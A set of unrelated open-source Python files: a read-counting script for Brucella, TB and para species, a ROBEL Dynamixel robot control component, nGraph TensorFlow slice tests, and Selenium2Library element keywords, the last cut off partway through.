bovis_string = ''.join(str(e) for e in bovis_binary)
para_binary = binary_list[24:]
para_string = ''.join(str(e) for e in para_binary)
return brucella_string, bovis_string, para_string
def output_dbkey(file_name, dbkey, output_file):
# Output the dbkey.
with open(output_file, "w") as fh:
fh.write("%s" % dbkey)
def output_files(fastq_file, count_list, group, dbkey, dbkey_file, metrics_file):
base_file_name = get_sample_name(fastq_file)
output_dbkey(base_file_name, dbkey, dbkey_file)
output_metrics(base_file_name, count_list, group, dbkey, metrics_file)
def output_metrics(file_name, count_list, group, dbkey, output_file):
# Output the metrics.
with open(output_file, "w") as fh:
fh.write("Sample: %s\n" % file_name)
fh.write("Brucella counts: ")
for i in count_list[:16]:
fh.write("%d," % i)
fh.write("\nTB counts: ")
for i in count_list[16:24]:
fh.write("%d," % i)
fh.write("\nPara counts: ")
for i in count_list[24:]:
fh.write("%d," % i)
fh.write("\nGroup: %s" % group)
fh.write("\ndbkey: %s\n" % dbkey)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--dnaprint_fields', action='append', dest='dnaprint_fields', nargs=2, help="List of dnaprints data table value, name and path fields")
parser.add_argument('--read1', action='store', dest='read1', help='Required: single read')
parser.add_argument('--read2', action='store', dest='read2', required=False, default=None, help='Optional: paired read')
parser.add_argument('--gzipped', action='store_true', dest='gzipped', help='Input files are gzipped')
parser.add_argument('--output_dbkey', action='store', dest='output_dbkey', help='Output reference file')
parser.add_argument('--output_metrics', action='store', dest='output_metrics', help='Output metrics file')
args = parser.parse_args()
fastq_list = [args.read1]
if args.read2 is not None:
fastq_list.append(args.read2)
# The value of dnaprint_fields is a list of lists, where each list is
# the [value, name, path] components of the vsnp_dnaprints data table.
# The data_manager_vsnp_dnaprints tool assigns the dbkey column from the
# all_fasta data table to the value column in the vsnp_dnaprints data
# table to ensure a proper mapping for discovering the dbkey.
dnaprints_dict = get_dnaprints_dict(args.dnaprint_fields)
# Here fastq_list consists of either a single read
# or a set of paired reads, producing single outputs.
count_summary, count_list, brucella_sum, bovis_sum, para_sum = get_species_counts(fastq_list, args.gzipped)
brucella_string, bovis_string, para_string = get_species_strings(count_summary)
group, dbkey = get_group_and_dbkey(dnaprints_dict, brucella_string, brucella_sum, bovis_string, bovis_sum, para_string, para_sum)
output_files(args.read1, count_list, group, dbkey, dbkey_file=args.output_dbkey, metrics_file=args.output_metrics)
|
|
# Copyright 2019 The ROBEL Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementation of HardwareRobotComponent using the DynamixelSDK."""
from typing import Dict, Iterable, Optional, Sequence, Tuple, Union
import numpy as np
from robel.components.robot import ControlMode
from robel.components.robot.dynamixel_client import DynamixelClient
from robel.components.robot.hardware_robot import (
HardwareRobotComponent, HardwareRobotGroupConfig, RobotState)
class DynamixelRobotState(RobotState):
"""Data class that represents the state of a Dynamixel robot."""
def __init__(self, *args, current: Optional[np.ndarray] = None, **kwargs):
"""Initializes a new state object.
Args:
current: The present current reading for the motors, in mA.
"""
super().__init__(*args, **kwargs)
self.current = current
class DynamixelGroupConfig(HardwareRobotGroupConfig):
"""Stores group configuration for a DynamixelRobotComponent."""
def __init__(self,
*args,
motor_ids: Optional[Iterable[int]] = None,
**kwargs):
"""Initializes a new configuration for a HardwareRobotComponent group.
Args:
motor_ids: The Dynamixel motor identifiers to associate with this
group.
"""
super().__init__(*args, **kwargs)
self.motor_ids = None
if motor_ids is not None:
self.motor_ids = np.array(motor_ids, dtype=int)
if self.calib_scale is not None:
assert self.motor_ids.shape == self.calib_scale.shape
if self.calib_offset is not None:
assert self.motor_ids.shape == self.calib_offset.shape
self.motor_id_indices = None
@property
def is_active(self) -> bool:
"""Returns True if the group is not in use."""
return self.motor_ids is not None
def set_all_motor_ids(self, all_motor_ids: Sequence[int]):
"""Sets this group's motor ID mask from the given total list of IDs."""
assert np.all(np.diff(all_motor_ids) > 0), \
'all_motor_ids must be sorted.'
assert np.all(np.isin(self.motor_ids, all_motor_ids))
self.motor_id_indices = np.searchsorted(all_motor_ids, self.motor_ids)
class DynamixelRobotComponent(HardwareRobotComponent):
"""Component for hardware robots using Dynamixel motors."""
# Cache dynamixel_py instances by device path.
DEVICE_CLIENTS = {}
def __init__(self, *args, groups: Dict[str, Dict], device_path: str,
**kwargs):
"""Initializes the component.
Args:
groups: Group configurations for reading/writing state.
device_path: The path to the Dynamixel device to open.
"""
self._combined_motor_ids = set()
super().__init__(*args, groups=groups, **kwargs)
self._all_motor_ids = np.array(
sorted(self._combined_motor_ids), dtype=int)
for group_config in self.groups.values():
if group_config.is_active:
group_config.set_all_motor_ids(self._all_motor_ids)
if device_path not in self.DEVICE_CLIENTS:
hardware = DynamixelClient(
self._all_motor_ids, port=device_path, lazy_connect=True)
self.DEVICE_CLIENTS[device_path] = hardware
self._hardware = self.DEVICE_CLIENTS[device_path]
def _process_group(self, **config_kwargs) -> DynamixelGroupConfig:
"""Processes the configuration for a group."""
config = DynamixelGroupConfig(self.sim_scene, **config_kwargs)
if config.is_active:
self._combined_motor_ids.update(config.motor_ids)
return config
def set_motors_engaged(self, groups: Union[str, Sequence[str], None],
engaged: bool):
"""Enables the motors in the given group name."""
# Interpret None as all motors.
if groups is None:
self._hardware.set_torque_enabled(self._all_motor_ids, engaged)
return
if isinstance(groups, str):
group_configs = [self.get_config(groups)]
else:
group_configs = [self.get_config(name) for name in groups]
total_motor_id_mask = np.zeros_like(self._all_motor_ids, dtype=bool)
for config in group_configs:
if config.is_active:
total_motor_id_mask[config.motor_id_indices] = True
self._hardware.set_torque_enabled(
self._all_motor_ids[total_motor_id_mask], engaged)
def _get_group_states(
self,
configs: Sequence[DynamixelGroupConfig],
) -> Sequence[DynamixelRobotState]:
"""Returns the states for the given group configurations."""
# Make one call to the hardware to get all of the positions/velocities,
# and extract each individual groups' subset from them.
all_qpos, all_qvel, all_cur = self._hardware.read_pos_vel_cur()
states = []
for config in configs:
state = DynamixelRobotState()
# Return a blank state if this is a sim-only group.
if config.motor_ids is None:
states.append(state)
continue
state.qpos = all_qpos[config.motor_id_indices]
state.qvel = all_qvel[config.motor_id_indices]
state.current = all_cur[config.motor_id_indices]
self._calibrate_state(state, config)
states.append(state)
self._copy_to_simulation_state(zip(configs, states))
return states
def _set_group_states(
self,
group_states: Sequence[Tuple[DynamixelGroupConfig, RobotState]],
block: bool = True,
**block_kwargs):
"""Sets the robot joints to the given states.
Args:
group_states: The states to set for each group.
block: If True, blocks the current thread until completion.
**block_kwargs: Arguments to pass to `_wait_for_desired_states`.
"""
# Filter out sim-only groups.
group_states = [(config, state)
for config, state in group_states
if config.is_active and state.qpos is not None]
if not group_states:
return
# Only write the qpos for the state.
group_control = [(config, state.qpos) for config, state in group_states]
self._set_hardware_control(group_control)
# Block until we've reached the given states.
if block:
self._wait_for_desired_states(group_states, **block_kwargs)
# Reset the step time.
self.reset_time()
def _perform_timestep(
self,
group_controls: Sequence[Tuple[DynamixelGroupConfig, np.ndarray]]):
"""Applies the given control values to the robot."""
self._set_hardware_control(group_controls)
self._synchronize_timestep()
def _set_hardware_control(
self,
group_control: Sequence[Tuple[DynamixelGroupConfig, np.ndarray]]):
"""Sets the desired hardware positions.
Args:
group_control: A list of (group config, control) pairs to write to
the hardware.
"""
total_motor_id_mask = np.zeros_like(self._all_motor_ids, dtype=bool)
total_qpos = np.zeros_like(self._all_motor_ids, dtype=np.float32)
for config, control in group_control:
if config.motor_ids is None:
continue
if control is not None:
# TODO(michaelahn): Consider if other control modes need
# decalibration.
if config.control_mode == ControlMode.JOINT_POSITION:
control = self._decalibrate_qpos(control, config)
total_motor_id_mask[config.motor_id_indices] = True
total_qpos[config.motor_id_indices] = control
if np.any(total_motor_id_mask):
# TODO(michaeahn): Need to switch control mode if we're not in joint
# position control.
self._hardware.write_desired_pos(
self._all_motor_ids[total_motor_id_mask],
total_qpos[total_motor_id_mask])
|
|
# ==============================================================================
# Copyright 2018-2020 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""nGraph TensorFlow bridge slice operation test
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import pytest
import tensorflow as tf
tf.compat.v1.disable_eager_execution()
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
from common import NgraphTest
class TestSliceOperations(NgraphTest):
def test_slice(self):
inp = np.random.rand(4, 4).astype("f")
slice_ts = []
expected = []
a = np.array([float(x) for x in inp.ravel(order="C")])
a.shape = (4, 4)
x = tf.compat.v1.placeholder(dtype=dtypes.float32)
slice_ts.append(array_ops.slice(x, [0, 0], [2, 2]))
slice_ts.append(array_ops.slice(x, [0, 0], [-1, -1]))
slice_ts.append(array_ops.slice(x, [2, 2], [-1, -1]))
def run_test(sess):
return sess.run(slice_ts, feed_dict={x: a})
slice_vals = self.with_ngraph(run_test)
expected.append(inp[:2, :2])
expected.append(inp[:, :])
expected.append(inp[2:, 2:])
for v, e in zip(slice_vals, expected):
np.testing.assert_array_equal(v, e)
def test_strided_slice(self):
inp = np.random.rand(4, 5).astype("f")
slice_ts = []
expected = []
a = np.array([float(x) for x in inp.ravel(order="C")])
a.shape = (4, 5)
x = tf.compat.v1.placeholder(dtype=dtypes.float32)
slice_ts.append(x[:])
slice_ts.append(x[:, :])
slice_ts.append(x[1:, :-2])
slice_ts.append(x[::2, :-2])
slice_ts.append(x[1, :])
slice_ts.append(x[:, 1])
slice_ts.append(x[1, 1])
slice_ts.append(x[0])
slice_ts.append(x[0][1])
slice_ts.append(x[-1])
# Various ways of representing identity slice
slice_ts.append(x[:, :])
slice_ts.append(x[::, ::])
slice_ts.append(x[::1, ::1])
# Reverse in each dimension independently
slice_ts.append(x[::-1, :])
slice_ts.append(x[:, ::-1])
## negative index tests i.e. n-2 in first component
slice_ts.append(x[-2::-1, ::1])
# degenerate by offering a forward interval with a negative stride
slice_ts.append(x[0:-1:-1, :])
# degenerate with a reverse interval with a positive stride
slice_ts.append(x[-1:0, :])
# empty interval in every dimension
slice_ts.append(x[-1:0, 2:3:-1])
slice_ts.append(x[2:2, 2:3:-1])
# stride greater than range
slice_ts.append(x[1:3:7, :])
# ellipses and new axis
slice_ts.append(x[:, tf.newaxis])
slice_ts.append(x[...])
slice_ts.append(x[1:2, ...])
def run_test(sess):
return sess.run(slice_ts, feed_dict={x: a})
slice_vals = self.with_ngraph(run_test)
expected.append(inp[:])
expected.append(inp[:, :])
expected.append(inp[1:, :-2])
expected.append(inp[::2, :-2])
expected.append(inp[1, :])
expected.append(inp[:, 1])
expected.append(inp[1, 1])
expected.append(inp[0])
expected.append(inp[0][1])
expected.append(inp[-1])
#TODO: support ellipses and new_axis correctly
# Various ways of representing identity slice
expected.append(inp[:, :])
expected.append(inp[::, ::])
expected.append(inp[::1, ::1])
# Reverse in each dimension independently
expected.append(inp[::-1, :])
expected.append(inp[:, ::-1])
## negative index tests i.e. n-2 in first component
expected.append(inp[-2::-1, ::1])
# degenerate by offering a forward interval with a negative stride
expected.append(inp[0:-1:-1, :])
# degenerate with a reverse interval with a positive stride
expected.append(inp[-1:0, :])
# empty interval in every dimension
expected.append(inp[-1:0, 2:3:-1])
expected.append(inp[2:2, 2:3:-1])
# stride greater than range
expected.append(inp[1:3:7, :])
# ellipses and new axis
expected.append(inp[:, tf.newaxis])
expected.append(inp[...])
expected.append(inp[1:2, ...])
for v, e in zip(slice_vals, expected):
np.testing.assert_array_equal(v, e)
def test_strided_slice_2(self):
inp = np.random.rand(3, 2, 3).astype("f")
slice_ts = []
expected = []
a = np.array([float(x) for x in inp.ravel(order="C")])
a.shape = (3, 2, 3)
x = tf.compat.v1.placeholder(dtype=dtypes.float32)
slice_ts.append(x[0:2, 1:2, 2:1:-1])
def run_test(sess):
return sess.run(slice_ts, feed_dict={x: a})
slice_vals = self.with_ngraph(run_test)
expected.append(inp[0:2, 1:2, 2:1:-1])
for v, e in zip(slice_vals, expected):
np.testing.assert_array_equal(v, e)
def test_strided_slice_3(self):
inp = np.random.rand(3, 2, 3).astype("f")
slice_ts = []
expected = []
a = np.array([float(x) for x in inp.ravel(order="C")])
a.shape = (3, 2, 3)
x = tf.compat.v1.placeholder(dtype=dtypes.float32)
slice_ts.append(x[0:2, -1:3, 2:1:-1])
def run_test(sess):
return sess.run(slice_ts, feed_dict={x: a})
slice_vals = self.with_ngraph(run_test)
expected.append(inp[0:2, -1:3, 2:1:-1])
for v, e in zip(slice_vals, expected):
np.testing.assert_array_equal(v, e)
def test_strided_slice_4(self):
inp = np.random.rand(3, 2, 3).astype("f")
slice_ts = []
expected = []
a = np.array([float(x) for x in inp.ravel(order="C")])
a.shape = (3, 2, 3)
x = tf.compat.v1.placeholder(dtype=dtypes.float32)
slice_ts.append(x[0:1, -2:3, 3:0:-2])
def run_test(sess):
return sess.run(slice_ts, feed_dict={x: a})
slice_vals = self.with_ngraph(run_test)
expected.append(inp[0:1, -2:3, 3:0:-2])
for v, e in zip(slice_vals, expected):
np.testing.assert_array_equal(v, e)
def test_strided_slice_5(self):
a = [[[[[1, 2, 4, 5], [5, 6, 7, 8], [9, 10, 11, 12]]],
[[[13, 14, 15, 16], [17, 18, 19, 20], [21, 22, 23, 24]]]]]
bar = tf.constant(2)
bar2 = tf.constant(3)
x = tf.compat.v1.placeholder(dtype=dtypes.float32)
slice_ts = [
x[..., bar:bar2], x[..., bar], x[..., 3], x[..., 2**64 // 2**63]
]
def run_test(sess):
return sess.run(slice_ts, feed_dict={x: a})
slice_vals_ng = self.with_ngraph(run_test)
slice_vals_tf = self.without_ngraph(run_test)
for v, e in zip(slice_vals_ng, slice_vals_tf):
np.testing.assert_array_equal(v, e)
def test_strided_slice_zerodim(self):
inp = np.random.rand(4, 0, 5).astype("f")
slice_ts = []
expected = []
a = np.array([float(x) for x in inp.ravel(order="C")])
a.shape = (4, 0, 5)
x = tf.compat.v1.placeholder(dtype=dtypes.float32)
#(slicing an empty dim by empty slice)
slice_ts.append(x[1:2, 2:2, 1:2])
#(slicing an empty dim by non empty slice)
slice_ts.append(x[1:2, 1:2, 1:2])
def run_test(sess):
return sess.run(slice_ts, feed_dict={x: a})
slice_vals = self.with_ngraph(run_test)
expected.append(inp[1:2, 2:2, 1:2])
expected.append(inp[1:2, 1:2, 1:2])
for v, e in zip(slice_vals, expected):
np.testing.assert_array_equal(v, e)
def test_incorrect_strided_slice(self):
inp = 0
slice_ts = []
x = tf.compat.v1.placeholder(dtype=dtypes.float32)
#(slicing an empty dim by empty slice)
slice_ts.append(x[1:1])
def run_test(sess):
return sess.run(slice_ts, feed_dict={x: inp})
with pytest.raises(Exception) as excinfo:
slice_vals = self.with_ngraph(run_test)
assert excinfo.value.message
|
|
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.action_chains import ActionChains
from Selenium2Library import utils
from Selenium2Library.locators import ElementFinder
from keywordgroup import KeywordGroup
class _ElementKeywords(KeywordGroup):
def __init__(self):
self._element_finder = ElementFinder()
# Public, element lookups
def current_frame_contains(self, text, loglevel='INFO'):
"""Verifies that current frame contains `text`.
See `Page Should Contain ` for explanation about `loglevel` argument.
"""
if not self._is_text_present(text):
self.log_source(loglevel)
raise AssertionError("Page should have contained text '%s' "
"but did not" % text)
self._info("Current page contains text '%s'." % text)
def element_should_contain(self, locator, expected, message=''):
"""Verifies element identified by `locator` contains text `expected`.
If you wish to assert an exact (not a substring) match on the text
of the element, use `Element Text Should Be`.
`message` can be used to override the default error message.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
"""
self._info("Verifying element '%s' contains text '%s'."
% (locator, expected))
actual = self._get_text(locator)
if not expected in actual:
if not message:
message = "Element '%s' should have contained text '%s' but "\
"its text was '%s'." % (locator, expected, actual)
raise AssertionError(message)
def element_should_not_contain(self, locator, not_expected, message=''):
"""Verifies element identified by `locator` does not contain text `not_expected`.
If you wish to assert an exact (not a substring) match on the text
of the element, use `Element Text Should Be`.
`message` can be used to override the default error message.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
"""
self._info("Verifying element '%s' does not contain text '%s'."
% (locator, not_expected))
actual = self._get_text(locator)
if not_expected in actual:
if not message:
message = "Element '%s' should not have contained text '%s' but "\
"its text was '%s'." %(locator, not_expected, actual)
raise AssertionError(message)
def frame_should_contain(self, locator, text, loglevel='INFO'):
"""Verifies frame identified by `locator` contains `text`.
See `Page Should Contain ` for explanation about `loglevel` argument.
Key attributes for frames are `id` and `name.` See `introduction` for
details about locating elements.
"""
if not self._frame_contains(locator, text):
self.log_source(loglevel)
raise AssertionError("Page should have contained text '%s' "
"but did not" % text)
self._info("Current page contains text '%s'." % text)
def page_should_contain(self, text, loglevel='INFO'):
"""Verifies that current page contains `text`.
If this keyword fails, it automatically logs the page source
using the log level specified with the optional `loglevel` argument.
Giving `NONE` as level disables logging.
"""
if not self._page_contains(text):
self.log_source(loglevel)
raise AssertionError("Page should have contained text '%s' "
"but did not" % text)
self._info("Current page contains text '%s'." % text)
def page_should_contain_element(self, locator, message='', loglevel='INFO'):
"""Verifies element identified by `locator` is found on the current page.
`message` can be used to override default error message.
See `Page Should Contain` for explanation about `loglevel` argument.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
"""
self._page_should_contain_element(locator, None, message, loglevel)
def page_should_not_contain(self, text, loglevel='INFO'):
"""Verifies the current page does not contain `text`.
See `Page Should Contain ` for explanation about `loglevel` argument.
"""
if self._page_contains(text):
self.log_source(loglevel)
raise AssertionError("Page should not have contained text '%s'" % text)
self._info("Current page does not contain text '%s'." % text)
def page_should_not_contain_element(self, locator, message='', loglevel='INFO'):
"""Verifies element identified by `locator` is not found on the current page.
`message` can be used to override the default error message.
See `Page Should Contain ` for explanation about `loglevel` argument.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
"""
self._page_should_not_contain_element(locator, None, message, loglevel)
# Public, attributes
def assign_id_to_element(self, locator, id):
"""Assigns a temporary identifier to element specified by `locator`.
This is mainly useful if the locator is complicated/slow XPath expression.
Identifier expires when the page is reloaded.
Example:
| Assign ID to Element | xpath=//div[@id="first_div"] | my id |
| Page Should Contain Element | my id |
"""
self._info("Assigning temporary id '%s' to element '%s'" % (id, locator))
element = self._element_find(locator, True, True)
self._current_browser().execute_script("arguments[0].id = '%s';" % id, element)
def element_should_be_disabled(self, locator):
"""Verifies that element identified with `locator` is disabled.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
"""
if self._is_enabled(locator):
raise AssertionError("Element '%s' is enabled." % (locator))
def element_should_be_enabled(self, locator):
"""Verifies that element identified with `locator` is enabled.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
"""
if not self._is_enabled(locator):
raise AssertionError("Element '%s' is disabled." % (locator))
def element_should_be_visible(self, locator, message=''):
"""Verifies that the element identified by `locator` is visible.
Herein, visible means that the element is logically visible, not optically
visible in the current browser viewport. For example, an element that carries
display:none is not logically visible, so using this keyword on that element
would fail.
`message` can be used to override the default error message.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
"""
self._info("Verifying element '%s' is visible." % locator)
visible = self._is_visible(locator)
if not visible:
if not message:
message = "The element '%s' should be visible, but it "\
"is not." % locator
raise AssertionError(message)
def element_should_not_be_visible(self, locator, message=''):
"""Verifies that the element identified by `locator` is NOT visible.
This is the opposite of `Element Should Be Visible`.
`message` can be used to override the default error message.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
"""
self._info("Verifying element '%s' is not visible." % locator)
visible = self._is_visible(locator)
if visible:
if not message:
message = "The element '%s' should not be visible, "\
"but it is." % locator
raise AssertionError(message)
def element_text_should_be(self, locator, expected, message=''):
"""Verifies element identified by `locator` exactly contains text `expected`.
In contrast to `Element Should Contain`, this keyword does not try
a substring match but an exact match on the element identified by `locator`.
`message` can be used to override the default error message.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
"""
self._info("Verifying element '%s' contains exactly text '%s'."
% (locator, expected))
element = self._element_find(locator, True, True)
actual = element.text
if expected != actual:
if not message:
message = "The text of element '%s' should have been '%s' but "\
"in fact it was '%s'." % (locator, expected, actual)
raise AssertionError(message)
def get_element_text(self, locator, strip_text=True):
"""Gets text contained in element, found by locator.
By default it removes whitespace from begining and end
of text. That behavior can be changed by passing `strip_text`
argument.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
"""
element = self._element_find(locator, True, False)
if element is None:
raise ValueError("Element '%s' not found." % (locator))
if strip_text:
return element.text.strip()
else:
return element.text
def get_element_attribute(self, attribute_locator):
"""Return value of element attribute.
`attribute_locator` consists of element locator followed by an @ sign
and attribute name, for example "element_id@class".
"""
locator, attribute_name = self._parse_attribute_locator(attribute_locator)
element = self._element_find(locator, True, False)
if element is None:
raise ValueError("Element '%s' not found." % (locator))
return element.get_attribute(attribute_name)
def get_horizontal_position(self, locator):
"""Returns horizontal position of element identified by `locator`.
The position is returned in pixels off the left side of the page,
as an integer. Fails if a matching element is not found.
See also `Get Vertical Position`.
"""
element = self._element_find(locator, True, False)
if element is None:
raise AssertionError("Could not determine position for '%s'" % (locator))
return element.location['x']
def get_value(self, locator):
"""Returns the value attribute of element identified by `locator`.
See `introduction` for details about locating elements.
"""
return self._get_value(locator)
def get_text(self, locator):
"""Returns the text value of element identified by `locator`.
See `introduction` for details about locating elements.
"""
return self._get_text(locator)
def get_vertical_position(self, locator):
"""Returns vertical position of element identified by `locator`.
The position is returned in pixels off the top of the page,
as an integer. Fails if a matching element is not found.
See also `Get Horizontal Position`.
"""
element = self._element_find(locator, True, False)
if element is None:
raise AssertionError("Could not determine position for '%s'" % (locator))
return element.location['y']
# Public, mouse input/events
def click_element(self, locator):
"""Click element identified by `locator`.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
"""
self._info("Clicking element '%s'." % locator)
self._element_find(locator, True, True).click()
def double_click_element(self, locator):
"""Double click element identified by `locator`.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
"""
self._info("Double clicking element '%s'." % locator)
element = self._element_find(locator, True, True)
ActionChains(self._current_browser()).double_click(element).perform()
def focus(self, locator):
"""Sets focus to element identified by `locator`."""
element = self._element_find(locator, True, True)
self._current_browser().execute_script("arguments[0].focus();", element)
def drag_and_drop(self, source, target):
"""Drags element identified with `source` which is a locator.
Element can be moved on top of another element with `target`
argument.
`target` is a locator of the element where the dragged object is
dropped.
Examples:
| Drag And Drop | elem1 | elem2 | # Move elem1 over elem2. |
"""
src_elem = self._element_find(source,True,True)
trg_elem = self._element_find(target,True,True)
ActionChains(self._current_browser()).drag_and_drop(src_elem, trg_elem).perform()
def drag_and_drop_by_offset(self, source, xoffset, yoffset):
"""Drags element identified with `source` which is a locator.
Element will be moved by xoffset and yoffset. each of which is a
negative or positive number specify the offset.
Examples:
| Drag And Drop | myElem | 50 | -35 | # Move myElem 50px right and 35px down. |
"""
src_elem = self._element_find(source, True, True)
ActionChains(self._current_browser()).drag_and_drop_by_offset(src_elem, xoffset, yoffset).perform()
def mouse_down(self, locator):
"""Simulates pressing the left mouse button on the element specified by `locator`.
The element is pressed without releasing the mouse button.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
See also the more specific keywords `Mouse Down On Image` and
`Mouse Down On Link`.
"""
self._info("Simulating Mouse Down on element '%s'" % locator)
element = self._element_find(locator, True, False)
if element is None:
raise AssertionError("ERROR: Element %s not found." % (locator))
ActionChains(self._current_browser()).click_and_hold(element).perform()
def mouse_out(self, locator):
"""Simulates moving mouse away from the element specified by `locator`.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
"""
self._info("Simulating Mouse Out on element '%s'" % locator)
element = self._element_find(locator, True, False)
if element is None:
raise AssertionError("ERROR: Element %s not found." % (locator))
size = element.size
offsetx = (size['width'] / 2) + 1
offsety = (size['height'] / 2) + 1
ActionChains(self._current_browser()).move_to_element(element).move_by_offset(offsetx, offsety).perform()
def mouse_over(self, locator):
"""Simulates hovering mouse over the element specified by `locator`.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
"""
self._info("Simulating Mouse Over on element '%s'" % locator)
element = self._element_find(locator, True, False)
if element is None:
raise AssertionError("ERROR: Element %s not found." % (locator))
ActionChains(self._current_browser()).move_to_element(element).perform()
def mouse_up(self, locator):
"""Simulates releasing the left mouse button on the element specified by `locator`.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
"""
self._info("Simulating Mouse Up on element '%s'" % locator)
element = self._element_find(locator, True, False)
if element is None:
raise AssertionError("ERROR: Element %s not found." % (locator))
ActionChains(self._current_browser()).click_and_hold(element).release(element).perform()
def open_context_menu(self, locator):
"""Opens context menu on element identified by `locator`."""
element = self._element_find(locator, True, True)
ActionChains(self._current_browser()).context_click(element).perform()
def simulate(self, locator, event):
"""Simulates `event` on element identified by `locator`.
This keyword is useful if element has OnEvent handler that needs to be
explicitly invoked.
See `introduction` for details about locating elements.
"""
element = self._element_find(locator, True, True)
script = """
element = arguments[0];
eventName = arguments[1];
if (document.createEventObject) { // IE
return element.fireEvent('on' + eventName, document.createEventObject());
}
var evt = document.createEvent("HTMLEvents");
evt.initEvent(eventName, true, true);
return !element.dispatchEvent(evt);
"""
self._current_browser().execute_script(script, element, event)
def press_key(self, locator, key):
"""Simulates user pressing key on element identified by `locator`.
`key` is either a single character, or a numerical ASCII code of the key
lead by '\\'.
Examples:
| Press Key | text_field | q |
| Press Key | login_button | \\13 | # ASCII code for enter key |
"""
if key.startswith('\\') and len(key) > 1:
key = self._map_ascii_key_code_to_key(int(key[1:]))
#if len(key) > 1:
# raise ValueError("Key value '%s' is invalid.", key)
element = self._element_find(locator, True, True)
#select it
element.send_keys(key)
# Public, links
def click_link(self, locator):
"""Clicks a link identified by locator.
Key attributes for links are `id`, `name`, `href` and link text. See
`introduction` for details about locating elements.
"""
self._info("Clicking link '%s'." % locator)
link = self._element_find(locator, True, True, tag='a')
link.click()
def get_all_links(self):
"""Returns a list containing ids of all links found in current page.
If a link has no id, an empty string will be in the list instead.
"""
links = []
for anchor in self._element_find("tag=a", False, False, 'a'):
links.append(anchor.get_attribute('id'))
return links
def mouse_down_on_link(self, locator):
"""Simulates a mouse down event on a link.
Key attributes for links are `id`, `name`, `href` and link text. See
`introduction` for details about locating elements.
"""
element = self._element_find(locator, True, True, 'link')
ActionChains(self._current_browser()).click_and_hold(element).perform()
def page_should_contain_link(self, locator, message='', loglevel='INFO'):
"""Verifies link identified by `locator` is found from current page.
See `Page Should Contain Element` for explanation about `message` and
`loglevel` arguments.
Key attributes for links are `id`, `name`, `href` and link text. See
`introduction` for details about locating elements.
"""
self._page_should_contain_element(locator, 'link', message, loglevel)
def page_should_not_contain_link(self, locator, message='', loglevel='INFO'):
"""Verifies image identified by `locator` is not found from current page.
See `Page Should Contain Element` for explanation about `message` and
`loglevel` arguments.
Key attributes for images are `id`, `src` and `alt`. See
`introduction` for details about locating elements.
"""
self._page_should_not_contain_element(locator, 'link', message, loglevel)
# Public, images
def click_image(self, locator):
"""Clicks an image found by `locator`.
Key attributes for images are `id`, `src` and `alt`. See
`introduction` for details about locating elements.
"""
self._info("Clicking image '%s'." % locator)
element = self._element_find(locator, True, False, 'image')
if element is None:
# A form may have an image as it's submit trigger.
element = self._element_find(locator, True, True, 'input')
element.click()
def mouse_down_on_image(self, locator):
"""Simulates a mouse down event on an image.
Key attributes for images are `id`, `src` and `alt`. See
`introduction` for details about locating elements.
"""
element = self._element_find(locator, True, True, 'image')
ActionChains(self._current_browser()).click_and_hold(element).perform()
def page_should_contain_image(self, locator, message='', loglevel='INFO'):
"""Verifies image identified by `locator` is found from current page.
See `Page Should Contain Element` for explanation about `message` and
`loglevel` arguments.
Key attributes for images are `id`, `src` and `alt`. See
`introduction` for details about locating elements.
"""
self._page_should_contain_element(locator, 'image', message, loglevel)
def page_should_not_contain_image(self, locator, message='', loglevel='INFO'):
"""Verifies image identified by `locator` is found from current page.
See `Page Should Contain Element` for explanation about `message` and
`loglevel` arguments.
Key attributes for images are `id`, `src` and `alt`. See
`introduction` for details about locating elements.
"""
self._page_should_not_contain_element(locator, 'image', message, loglevel)
# Public, xpath
def get_matching_xpath_count(self, xpath):
"""Returns number of elements matching `xpath`
If you wish to assert the number of matching elements, use
`Xpath Should Match X Times`.
"""
count = len(self._element_find("xpath=" + xpath, False, False))
return str(count)
def xpath_should_match_x_times(self, xpath, expected_xpath_count, message='', loglevel='INFO'):
"""Verifies that the page contains the given number of elements located by the given `xpath`.
See `Page Should Contain Element` for explanation about `message` and
`loglevel` arguments.
"""
actual_xpath_count = len(self._element_find("xpath=" + xpath, False, False))
if int(actual_xpath_count) != int(expected_xpath_count):
if not message:
message = "Xpath %s should have matched %s times but matched %s times"\
%(xpath, expected_xpath_count, actual_xpath_count)
self.log_source(loglevel)
raise AssertionError(message)
self._info("Current page contains %s elements matching '%s'."
